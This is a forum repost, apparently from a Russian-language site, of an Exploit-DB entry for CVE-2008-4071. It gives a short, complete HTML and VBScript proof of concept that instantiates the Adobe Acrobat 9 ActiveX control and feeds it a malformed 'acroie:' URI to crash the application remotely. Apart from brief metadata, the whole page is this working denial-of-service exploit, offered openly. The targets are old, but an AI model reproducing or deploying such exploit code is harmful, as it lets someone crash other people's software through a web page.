Exploit Adobe Acrobat 9 - ActiveX Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6424
Проверка EDB
  1. Пройдено
Автор
JEREMY BROWN
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-4071
Дата публикации
2008-09-11
HTML:
<!-- Jeremy Brown ([email protected]/jbrownsec.blogspot.com)
     Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
     I can't seem to reproduce this on XP! Oh well.
     Of course the most popular app for reading pdfs is SfS/SfI :)
     Basically it will crash with any uri that adobe doesn't like.
     Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>

# milw0rm.com [2008-09-11]
 
Источник
www.exploit-db.com

Похожие темы